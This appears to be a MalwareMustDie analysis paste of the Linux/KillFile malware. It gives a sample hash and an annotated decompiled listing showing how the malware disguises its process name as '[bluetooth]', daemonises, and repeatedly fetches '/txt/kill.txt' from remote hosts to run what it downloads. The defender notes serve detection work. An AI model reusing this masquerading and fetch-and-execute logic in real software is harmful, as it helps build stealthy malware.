MalwareMustDie

Linux/KillFile

Apr 17th, 2014
  1. Linux/KillFile (made in China)
  2. It downloads and executes the Xor DDoS payload filelessly
  3.  
  4. hash : 82ba1e7c02b91ee4298717f9a8ba20aae3063107c8d818463ceb5829e5746b48 (uploaded to VirusTotal)
  5.  
  6. Reverse result:
  7.  
  8. void main(int a1, char arg2) // entry point: renames the process, daemonizes, then loops forever. arg2 is dereferenced below like argv (char **), so the `char` type looks like a decompiler artefact
  9. {
  10. size_t var_length_procname; from EAX
  11.  
  12. var_length_procname = strlen(*arg2); // length of the original argv[0] string
  13. memset(*arg2, 0, var_length_procname); // zeroes the original process name in place
  14. memcpy(*arg2, "[bluetooth]", 0xCu); // copies "[bluetooth]" plus its NUL (0xC = 12 bytes) over argv[0], so process listings show a kernel-thread-style bracketed name
  // Defender note: a genuine kernel thread has an empty /proc/<pid>/cmdline and no resolvable /proc/<pid>/exe;
  // a bracketed name whose exe link resolves to a user-space binary is a triage signal.
  15. daemon(1, 0); // daemon(nochdir=1, noclose=0): detaches into the background, keeps the current directory, redirects stdio to /dev/null
  16. nice(-20); // requests the highest scheduling priority; the return value is ignored
  17. while ( 1 )
  18. {
  19. if ( kill_time > 4 ) // kill_time is defined outside this listing; its initial value is not shown
  20. {
  21. kill_time = 0;
  22. killfileandpid(); // forks a child that runs KillProcess() (both shown below)
  23. RunFile(); // body not included in this listing -- presumably the download-and-execute step described in the header; confirm against the full sample
  24. }
  25. ++kill_time;
  26. sleep(1); // one-second tick: the two calls above fire roughly every five seconds
  27. }
  28. }
  29.  
  30. __pid_t killfileandpid() // forks a short-lived child that runs KillProcess(), then reaps it in the parent
  31. {
  32. __pid_t result; from EAX
  33.  
  34. result = fork();
  35. if ( result >= 0 ) // fork succeeded; a negative result is returned unchanged
  36. {
  37. if ( !result ) // child branch
  38. {
  39. setsid(); // child becomes leader of a new session
  40. umask(0); // clears the file-mode creation mask
  41. KillProcess(); // marked __noreturn and ends in _exit(0), so the child never reaches wait()
  42. }
  43. result = wait(0); // parent blocks until a child exits; the exit status is discarded
  44. }
  45. return result; // value from wait(), or fork()'s negative result on failure
  46. }
  47.  
  48. void __noreturn KillProcess() // fetches <Remote_URL[i]>/txt/kill.txt from up to four table entries and passes the result to GetProcess(); always ends in _exit(0)
  49. {
  50. int v0; // NOTE(review): used below as a 0x2800-byte buffer (memset/sprintf target), so `int` is presumably a decompiler mis-typing
  51. char s[10240]; // 10240 == 0x2800
  52. int i;
  53.  
  54. memset(s, 0, 0x2800); // buffer for file (receives the download)
  55. memset(&v0, 0, 0x2800); // buffer for mem (holds the request URL built below)
  56. for ( i = 0; ; ++i ) // walks the Remote_URL table, which is defined outside this listing
  57. {
  58. if ( i > 3 ) // entries 0..3 have all failed
  59. _exit(0);
  60. sprintf(&v0, "%s%s", *(DWORD)&Remote_URL[i], "/txt/kill.txt"); // URL = Remote_URL[i] + "/txt/kill.txt"; the fixed path is usable as a network indicator in proxy/HTTP logs
  61. if ( http_download(&v0, s, 0) ) // forming HTTP request "GET %s HTTP/1.1\r\n%sHost: %s\r\n%s"; save as file s -- NOTE(review): s is the stack array declared above, so the response appears to be held in memory; http_download body not shown, confirm
  62. break; // a non-zero return ends the retry loop
  63. }
  64. if ( s[strlen(s) - 1] == 10 ) // 10 == '\n'
  65. s[strlen(s) - 1] = 0; // strips one trailing newline from the downloaded content
  66. GetProcess(s); // use proc/exec to execute downloaded file and delete the file after exec -- NOTE(review): GetProcess body is not included in this listing; this description is the analyst's
  67. _exit(0);
  68. }
  69.  
  70. @unixfreaxjp #MalwareMustDie